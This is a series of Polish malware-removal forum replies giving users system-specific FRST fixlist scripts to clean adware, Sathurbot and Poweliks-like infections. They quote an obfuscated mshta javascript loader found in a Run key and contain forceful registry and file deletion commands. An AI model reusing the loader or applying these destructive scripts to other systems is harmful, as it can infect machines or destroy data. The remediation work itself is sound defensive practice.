picasso

Jeszcze usuń szczątki po odinstalowanych programach - zakładam, że Firefox jeszcze nie został zainstalowany (trzymam się tego co mówi ostatni podany log). Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: BootExecute: autocheck autochk * sdnclean64.exe RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox RemoveDirectory: C:\Program Files (x86)\Spybot - Search & Destroy 2 RemoveDirectory: C:\ProgramData\Mozilla RemoveDirectory: C:\ProgramData\Spybot - Search & Destroy RemoveDirectory: C:\Users\Ewa\AppData\Local\Mozilla RemoveDirectory: C:\Users\Ewa\AppData\Roaming\Mozilla RemoveDirectory: C:\Users\Ewa\AppData\Roaming\tor RemoveDirectory: C:\windows\System32\Tasks\Safer-Networking DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Safer-Networking CMD: del /q C:\Users\Ewa\AppData\Roaming\icon.ico CMD: del /q C:\windows\system32\CFG4132664122 Reg: reg delete HKCU\Software\Mozilla /f Reg: reg delete HKCU\Software\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\mozilla.org /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Nastąpi restart. Przedstaw wynikowy fixlog.txt.

Nic szczególnego, wykryte instalatory zawierające adware, w tym "Asystenty pobierania" dobrychprogramów i Softonic. O tym wszystkim tu: KLIK. Folder C:\Users\wangzhisong tworzy program Mobogenie - skasyfikowany jako niepożądany (typ PUP/adware). Mobogenie nie ma w Twoim systemie w formie zainstalowanej, jest więc to szczątek. Folder w całości możesz usunąć. Oceniając ostatnie dostarczone logi, jeszcze drobne puste wpisy do usunięcia (w międzyczasie usuwałeś programy). Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-1365672938-4047589735-543654078-1000\...\Run: [ALLUpdate] => "C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe" "sleep" BHO-x32: IplexToALLPlayer -> {DF925EF3-7A87-44E4-9CAF-8D7B280BF616} -> C:\PROGRA~2\ALLPLA~1\Iplex\IPLEXT~1.DLL No File FF Plugin-x32: @videolan.org/vlc,version=2.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll No File FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll No File CMD: del /q C:\Users\Ola\Downloads\Everest-Home-Edition(11558)-dp.jse Reg: reg delete HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I /f Reg: reg delete HKCU\Software\dobreprogramy /f DeleteQuarantine: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Przedstaw wynikowy fixlog.txt.

1. MBAM wykrył drobne rzeczy w kluczach Google Chrome - usuń za pomocą programu. 2. Zastosuj DelFix. Pobrany GMER usuń ręcznie. 3. Na wszelki wypadek pozmieniaj hasła logowania w ważnych serwisach (banki, poczta, etc.). To tyle.

Poproszę o dostarczenie obowiązujących tu logów FRST i GMER: KLIK.

Ale przecież tu nie koniec. Zrób obowiązujące logi FRST (mają powstać 3) oraz GMER do wglądu na okoliczność infekcji.

Podany tu Fixlist miał błędy - "MD:" zamiast "CMD:", nic nie zostanie odkryte na urządzeniach. Usuwam ten post. Poprawiona wersja: 1. Odinstaluj program ze zintegrowanym adware: Ace Stream Media 2.2.2-next. 2. Zakładam, że dyski przenośne nadal są widoczne pod literami H i J. Otwórz Notatnik i wklej w nim: CloseProcesses: R2 VSSS; C:\Users\tomek\AppData\Roaming\Microsoft\SystemCertificates\VSSVC.exe [100476224 2015-06-23] (Microsoft Corporation) [File not signed] HKLM\...\Policies\Explorer\Run: [1577572935] => C:\ProgramData\msshb.exe [80441344 2010-11-21] () HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1 HKLM\...\Policies\Explorer: [HideSCAHealth] 1 BootExecute: autocheck autochk * sdnclean64.exe Task: {7143BDD8-9BE4-4FF8-94DD-D408E575D7C0} - System32\Tasks\AutoKMS => C:\windows\AutoKMS\AutoKMS.exe Task: C:\windows\Tasks\AutoKMS.job => C:\windows\AutoKMS\AutoKMS.exe C:\Program Files\*.exe C:\ProgramData\msshb.exe C:\Users\tomek\AppData\Roaming\Microsoft\SystemCertificates\VSSVC.exe H:\*.lnk J:\*.lnk CMD: attrib /d /s -s -h H:\* CMD: attrib /d /s -s -h J:\* Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wejdź w Tryb awaryjny Windows. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wejdź na dyski H + J, powinny być widoczne foldery "bez nazwy" - przenieś dane z tych folderów poziom wyżej, po czym foldery te skasuj. 4. Przywracanie systemu zostało wyłączone (prawdopodobnie przez infekcję): ==================== Restore Points ========================= ATTENTION: System Restore is disabled Wejdź do interfejsu konfiguracji Przywracania: KLIK. Włącz Ochronę dla dysku C. 5. Mataczyłeś w msconfig, jest mnóstwo wyłączonych usług, część z nich nie powinna być wyłączona. W msconfig w karcie Usługi zaznacz z powrotem większość wpisów, te jednak możesz zostawić wyłączone: MSCONFIG\Services: Adobe LM Service => 3 MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3 MSCONFIG\Services: Autodesk Content Service => 2 MSCONFIG\Services: gupdate => 2 MSCONFIG\Services: gupdatem => 3 MSCONFIG\Services: IAStorDataMgrSvc => 2 MSCONFIG\Services: NvNetworkService => 2 MSCONFIG\Services: NvStreamSvc => 2 MSCONFIG\Services: nvsvc => 2 MSCONFIG\Services: nvUpdatusService => 2 MSCONFIG\Services: RemoteRegistry => 3 MSCONFIG\Services: ScrybeUpdater => 2 MSCONFIG\Services: ServiceLayer => 3 MSCONFIG\Services: SkypeUpdate => 2 MSCONFIG\Services: SpliCamService => 2 MSCONFIG\Services: Stereo Service => 2 MSCONFIG\Services: WMPNetworkSvc => 2 6. Na Pulpicie jest ukryty następujący "ruski" folder - czy jesteś świadomy jego obecności? 2015-06-06 00:14 - 2015-02-21 08:46 - 00000000 __SHD C:\Users\tomek\Desktop\Создаю свой сайт 7. Zrób nowe logi: FRST z opcji Scan (bez Addition i Shortcut), USBFix z opcji Listing oraz Farbar Service Scanner. Dołącz też plik fixlog.txt.

Proszę trzymaj się poprzedniego serwisu wklej.org, jeśli logi są doczepiane nie przez załączniki forum (ale preferuję załączniki forum). Serwis wklejto nie jest dobry, zniekształca kodowanie raportów (specjalne znaki Unicode są zmienione i już nieprzetwarzalne przez FRST). Co widać w raportach: 1. Problem infekcji w ogóle nie rozwiązany - infekcja grasuje na dobre - m.in. Sathurbot w ShellIconOverlayIdentifiers i coś co wygląda na wariant infekcji w rodzaju Poweliks / Xswkit. Prócz tego, jest też adware w Firefox. 2. Druga sprawa - szykuje się też problem sprzętowy i będzie potem analizowany z osobna w innym dziale (Hardware). Dziennik zdarzeń notuje bad sektory dysku: System errors: ============= Error: (06/23/2015 08:30:08 PM) (Source: disk) (EventID: 7) (User: ) Description: The device, \Device\Harddisk0\DR0, has a bad block. Wstępne akcje do wdrożenia pod kątem infekcji: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2015-05-09] () HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [{B207AD06-2E17-B7AE-DDC4-9BEB3C8557B4}] => C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpC443.exe [147456 2015-06-26] (Spazio irradiato) HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [**a40298fb] => mshta javascript:joLAa8mI="ckNa";s5C=new%20ActiveXObject("WScript.Shell");cat9SDS="lkCtOxBnB";EX8zw=s5C.RegRead("HKCU\\software\\c17946de\\bdcff458");L7o4EKNG="y";eval(EX8zw);EhtnPXXk7="Jc"; HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [Ewption] => C:\Users\Cezary\AppData\Local\Ewption\tmpC443.exe [147456 2015-06-26] (Spazio irradiato) HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [ProxyGate] => C:\Users\Cezary\AppData\Roaming\ProxyGate\MainService.exe R0 3C325EAB; C:\Windows\System32\drivers\3C325EAB.sys [457824 2015-05-09] (Kaspersky Lab ZAO) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\3C325EAB.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\3C325EAB.sys => ""="Driver" Task: {6B3467E3-0E13-4B8A-AE31-7838931C70D5} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe Task: {A865DAAC-2E82-4E94-957E-9E9D996EF901} - System32\Tasks\{DB176E6A-E593-4BAF-A38D-E965F38CEB05} => pcalua.exe -a "C:\Users\Cezary\AppData\Roaming\Any Send Packages\uninstaller.exe" -c /Uninstall /NM="Any Send Packages" /AN="" /MBN="Any Send Packages" Task: {A9C6DEB1-C97C-4240-8EC2-71AE96E633BC} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [2015-06-24] () Task: {AF859B7D-8A89-4CDE-8582-3AEBD22BC8D5} - System32\Tasks\{7EA6F83A-7028-4153-B8F4-2A074365744C} => pcalua.exe -a C:\Users\Cezary\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveSetup.exe -c /uninstall Task: {B22EB681-CDB3-4B9D-8ADC-7052995D9949} - System32\Tasks\AutoKMSDaily => C:\Windows\AutoKMS\AutoKMS.exe Task: {C99E0E80-BB4B-4F67-A840-98209D263A83} - System32\Tasks\{B9260C24-276A-44BF-A844-BC40E35A8BFD} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\Silverlight.Configuration.exe" -c -uninstallApp 2765766442.portal.qtrax.com Task: {EC54CC44-8812-42C0-8DEC-AE05D6FAAC70} - System32\Tasks\{999C1430-8EBE-4118-8C1B-69F4AF905631} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\Silverlight.Configuration.exe" -c -uninstallApp 2765766442.portal.qtrax.com Task: {FDD60CF7-5388-4CE0-BF63-947E38D88B77} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [2015-06-24] () Task: C:\WINDOWS\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe Task: C:\WINDOWS\Tasks\AutoKMSDaily.job => C:\Windows\AutoKMS\AutoKMS.exe CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSE1 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSE1 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com SearchScopes: HKU\S-1-5-21-669934448-3564392166-1087876309-1001 -> {69ABAE4C-47BC-4EAD-A2B3-ED08ED617830} URL = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-669934448-3564392166-1087876309-1001 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK FF Plugin-x32: @qq.com/QQPhotoDrawEx -> C:\Program Files (x86)\Tencent\Qzone\Ver_247.312\npQQPhotoDrawEx.dll No File FF HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Firefox\Extensions: [speedtest4354@BestOffers] - C:\Users\Cezary\AppData\Roaming\Mozilla\Extensions\speedtest4354@BestOffers FF Extension: Speed Test 127 - C:\Users\Cezary\AppData\Roaming\Mozilla\Extensions\speedtest4354@BestOffers [2014-02-03] C:\Program Files (x86)\QQMailPlugin C:\ProgramData\2320303d353737_c C:\ProgramData\@system.temp C:\ProgramData\@system3.att C:\ProgramData\Microsoft\Performance C:\ProgramData\TEMP C:\Users\Cezary\AppData\Local\Ewption C:\Users\Cezary\AppData\Roaming\麽鎒駓覜 C:\Users\Cezary\AppData\Roaming\my_intel.sys C:\Users\Cezary\AppData\Roaming\sp_data.sys C:\Users\Cezary\AppData\Roaming\ChromeUpdate C:\Users\Cezary\AppData\Roaming\ProxyGate C:\Windows\System32\drivers\3C325EAB.sys C:\WINDOWS\SysWOW64\029B560A371F4E00AB32838EBC01B9E7 DeleteKey: HKCU\Software\c17946de DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run CMD: netsh advfirewall reset CMD: dir /a C:\Users\Cezary\AppData\Roaming\Chromodo Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z menu Notatnika > Plik > Zapisz jako > wprowadź nazwę fixlist.txt > Kodowanie zmień na UTF-8 Plik fixlist.txt umieść obok narzędzia FRST. Przejdź w Tryb awaryjny Windows, by ani infekcja ani COMODO nie zablokowały FRST. Uruchom FRST i kliknij w Fix. Gdy Fix ukończy pracę, nastąpi restart, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Przez Panel sterowania odinstaluj sponsorowany zbędnik McAfee Security Scan Plus. jeśli nie używasz, pozbądź się też Skype Click to Call. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 4. Zrób nowe logi: FRST z opcji Scan (z Addition) oraz Farbar Service Scanner. Dołącz też plik fixlog.txt. Wszystkie logi proszę załącz w formie oryginalnej, tzn. jako załączniki forum a nie na serwisach wklejkowych.

Nie wiem. Jestem w stanie sprawdzić tylko te urządzenia USB, które zostały podpięte do Windows i wykazane w skanie USBFix. Wszystko wykonane, z tym że aktualnie log USBFix robiłeś bez podpiętego jednego z dysków USB (mapowany wcześniej jako H). Kolejne poprawki: 1. Otwórz Notatnik i wklej w nim: Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f RemoveDirectory: C:\FRST\Quarantine Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Pokaż wynikowy fixlog.txt. 2. Zrób pełny skan systemu za pomocą Malwarebytes Anti-Malware. Jeśli coś wykryje, przedstaw raport wynikowy.

szyszka, ten wadliwy post z sieczką OTL usuwam. Nie objaśniłeś w ogóle też tematu zasadniczego, tzn. na czym polega "nie działanie EXE" (jaki błąd). Jedyne co tu pasuje do opisu to te wartości niedomyślne (były czymś modyfikowane, w HKU nie ma domyślnie żadnych asocjacji EXE): HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\Software\Classes\.exe: exefile => "%1" %* HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\Software\Classes\exefile: "%1" %* Są też i różne szczątki adware do usunięcia, w tym cała przeglądarka Google Chrome przekonwertowana przez adware z wersji stabilnej do developerskiej. Wstępnie: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\Software\Classes\.exe: exefile => "%1" %* HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\Software\Classes\exefile: "%1" %* HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service" Task: {0DE060A0-B70C-4940-ACE3-B767A1A29D1C} - System32\Tasks\{D88536E6-6347-4A9D-BCCA-070A96D4278E} => pcalua.exe -a C:\Users\Szyszka\Desktop\pity2011ngsetup.exe -d C:\Users\Szyszka\Desktop Task: {3997BD38-B4CF-4E24-BA01-4BEE5C4C231D} - System32\Tasks\{5A731068-33F3-4589-AD74-AC0B2A2010BE} => D:\-=PULPIT=-\accaunt stream\accaunt stream\AccountStreamHotmail.exe Task: {6B511F6F-9E51-4041-90E7-A9FBA4A1DB58} - System32\Tasks\{02706A6E-53A1-473F-9A90-2C5E248DFA5F} => D:\-=PULPIT=-\niszki z łowcy\Dragon Ball Xenoverse\Dragon Ball Xenoverse.exe Task: {8A7C714C-C907-45AE-8EFC-61682EC52988} - System32\Tasks\{62D21132-DC3B-4760-B12F-D23A218A89DE} => pcalua.exe -a "C:\Program Files\PITy\PITy2011NG\unins000.exe" Task: {9BE97635-4286-4F15-BA78-45C2BAA79EA7} - System32\Tasks\e-pity2012_styczen => C:\Program Files\e-file\e-pity2012\signxml.exe Task: {B2F03C29-533D-4535-9DB6-1DC6C7B41A9C} - System32\Tasks\{98F508C6-98BA-4ACD-B651-4CB9B54F2C76} => D:\-=PULPIT=-\niszki z łowcy\Dragon Ball Xenoverse\Dragon Ball Xenoverse.exe Task: {C4184739-699F-4035-B77D-6D45E088FE40} - System32\Tasks\{CC7C7B81-0F77-490C-8C01-52818FF0B98A} => D:\-=PULPIT=-\niszki z łowcy\Dragon Ball Xenoverse\Dragon Ball Xenoverse.exe Task: {C6E1FF7E-5057-440F-970C-414BC34A3EEA} - System32\Tasks\{9BCD6F2A-17D7-464E-BD53-3567CBCA3F9C} => pcalua.exe -a "C:\Users\Szyszka\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQLGWJHL\pity2011ngsetup[1].exe" -d C:\Users\Szyszka\Desktop Task: {D177D59F-8BA0-4D04-9BE0-D2B391ED9839} - System32\Tasks\e-pity2012_kwiecien => C:\Program Files\e-file\e-pity2012\signxml.exe Task: {D2F2480A-C93B-44E1-8D4C-2F0628A72196} - System32\Tasks\{1FD00C96-AE97-4A1F-B94D-6734836C4C7D} => C:\Users\Szyszka\Desktop\Office2007HNS_MSLT_PL.EXE Task: {DED8503A-2C87-4B27-BD59-12F02617A24D} - System32\Tasks\{6DDDB839-87C8-4A89-827E-C7DF2CA99317} => C:\Program Files\Mass Video Downloader\MassVideoDownloader.exe Task: {E9E5251E-7D8B-44F0-AB10-A7EB36AF61B1} - System32\Tasks\{A9A74089-328D-4C0E-8822-45DCC268CBD0} => C:\Program Files\U2bviews\U2bviews Software\U2bviews Software.exe Task: {EF6268DA-E9D9-4128-BE7B-60DBA73CB128} - System32\Tasks\{920FF6A2-96B9-44BF-AD31-E8BD289BC8D8} => D:\-=PULPIT=-\PPJoyJoy.exe S3 ALSysIO; \??\C:\Users\Szyszka\AppData\Local\Temp\ALSysIO.sys [X] U5 AppMgmt; C:\windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S3 MBAMSwissArmy; \??\C:\windows\system32\drivers\MBAMSwissArmy.sys [X] U4 WMCoreService; No ImagePath Startup: C:\Users\Szyszka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2014-09-28] StartMenuInternet: (HKLM) Opera - c:\program files\opera\opera.exe http://www.delta-homes.com/?utm_source=b&utm_medium=wpm0613&utm_campaign=installer&utm_content=sc&from=wpm0613&uid=TOSHIBAXMK5055GSX_209FP0ZFTXX209FP0ZFT&ts=1402567402 GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKU\S-1-5-21-2440634791-3158896077-4223476700-1001\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab FF Plugin: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll No File FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll No File FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird C:\Program Files\mozilla firefox\plugins C:\ProgramData\Temp Folder: C:\Device Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 3. Akcje związane z Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Odinstaluj całkowicie przeglądarkę. Przy deinstalacji zaznacz opcję Usuń także dane przeglądarki. 4. Zrób nowy log FRST z opcji Scan (zaznacz ponownie pole Addition, by powstały dwa logi). Dołącz też plik fixlog.txt. Opisz jakie są rezultaty w/w działań.

Jeszcze poprawki - puste wpisy w Autostarcie (ten "A PDF Page Crop 4.7. keygen" to komponent adware Multiplug) oraz kilka innych drobnostek. Startup: C:\Users\Morgana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A PDF Page Crop 4.7. keygen.lnk [2015-04-24] ShortcutTarget: A PDF Page Crop 4.7. keygen.lnk -> C:\ProgramData\{bcd51f8f-4edb-3448-bcd5-51f8f4ed7e3d}\A PDF Page Crop 4.7. keygen.exe (No File) Startup: C:\Users\Morgana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wysyłanie do programu OneNote.lnk [2015-05-06] ShortcutTarget: Wysyłanie do programu OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (No File) 1. Przez Panel sterowania odinstaluj program typu "PUP" - FileViewPro. Następnie wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 2. Przywracanie systemu jest wyłączone (prawdopodobnie przez malware): ==================== Restore Points ========================= ATTENTION: System Restore is disabled Wejdź do interfejsu konfiguracji Przywracania: KLIK. Włącz Ochronę dla dysku C. 3. Pobierz ponownie FRST. Otwórz Notatnik i wklej w nim: Startup: C:\Users\Morgana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A PDF Page Crop 4.7. keygen.lnk [2015-04-24] Startup: C:\Users\Morgana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wysyłanie do programu OneNote.lnk [2015-05-06] HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VDWFP => ""="Driver" SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg query "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes" /s Reg: reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes" /s Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Przedstaw wynikowy fixlog.txt.

